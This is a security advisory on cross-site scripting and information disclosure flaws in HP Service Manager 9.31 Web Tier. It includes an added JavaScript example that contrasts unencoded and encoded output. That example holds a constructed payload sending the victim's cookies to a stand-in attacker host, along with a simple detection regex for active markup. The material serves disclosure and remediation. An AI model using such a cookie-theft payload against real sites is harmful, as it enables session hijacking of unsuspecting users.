V-146: HP Service Manager Bugs Permit Cross-Site Scripting and Information Disclosure Attacks

May 1, 2013 - 12:43am

PROBLEM:

HP Service Manager Bugs Permit Cross-Site Scripting and Information Disclosure Attacks

PLATFORM:

Service Manager v9.31 Web Tier

ABSTRACT:

Two vulnerabilities were reported in the HP Service Manager Web Tier: an information disclosure issue and a cross-site scripting issue.

REFERENCE LINKS:

HP Document ID: c03748875
SecurityTracker Alert ID: 1028496
CVE-2012-5222
CVE-2013-2321

IMPACT ASSESSMENT:

Medium

DISCUSSION:

A remote user can obtain potentially sensitive information [CVE-2012-5222]. The HP advisory does not describe the affected component or the data exposed in further detail.

The Service Manager Web Tier does not properly filter HTML from user-supplied input before displaying it [CVE-2013-2321]. A remote user can therefore cause arbitrary script to execute in a target user's browser. Because the script originates from the site running the Web Tier, it runs in that site's security context and can access the target user's cookies for the site (including authentication cookies), read data the target user recently submitted to the site via web forms, or take actions on the site as the target user.
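The following is an added example, not HP's code and not a reproduction of the Service Manager flaw: it shows the general pattern the paragraph above describes (user input concatenated into a page without encoding) beside the corrected form, and checks whether a cookie-stealing payload survives as executable markup. The page template, the request value and the attacker host are constructed for illustration.

```javascript
// Added example (not code from HP Service Manager): a reflected value rendered
// without output encoding, beside the same rendering with HTML entity encoding.
// The page fragment, payload and attacker host below are constructed.

// Minimal HTML entity encoder for text placed in an element body or a
// double-quoted attribute value. Covers the five characters that can break
// out of those contexts.
function encodeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// Vulnerable pattern: the user-supplied value is placed into markup verbatim,
// so a value containing tags becomes part of the page's DOM.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

// Hardened pattern: the same page, with the value encoded at the point of
// output. The browser displays the characters instead of parsing them as HTML.
function renderSearchHardened(query) {
  return `<p>Results for: ${encodeHtml(query)}</p>`;
}

// Crude check for a script element or an inline event-handler attribute in the
// rendered markup. It is only used here to show whether the payload survived
// as executable content; it is not a general XSS detector.
function containsActiveMarkup(html) {
  return /<script\b|<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Constructed attacker payload: loads an image from an attacker-controlled host
// with the victim's cookies in the query string, the cookie-theft outcome the
// advisory describes. "attacker.example" is a placeholder, not a real host.
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Render the payload both ways and report whether it remains executable.
function demo() {
  const vuln = renderSearchVulnerable(PAYLOAD);
  const safe = renderSearchHardened(PAYLOAD);
  return {
    vulnerableExecutes: containsActiveMarkup(vuln),
    hardenedExecutes: containsActiveMarkup(safe),
    hardened: safe,
  };
}

console.log(demo());
```

Marking the session cookie HttpOnly blunts the cookie-theft outcome but not the other two in the paragraph above, since injected script still runs in the site's origin and can submit requests as the user; encoding at the point of output is the fix that removes all three.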

IMPACT:

A remote user can obtain potentially sensitive information.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the HP Service Manager Web Tier software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

SOLUTION:

HP has provided an update for Service Manager Web Tier that resolves both vulnerabilities. Download and install the update from HP Software Support Online (SSO); see HP document ID c03748875 for the affected versions and update details.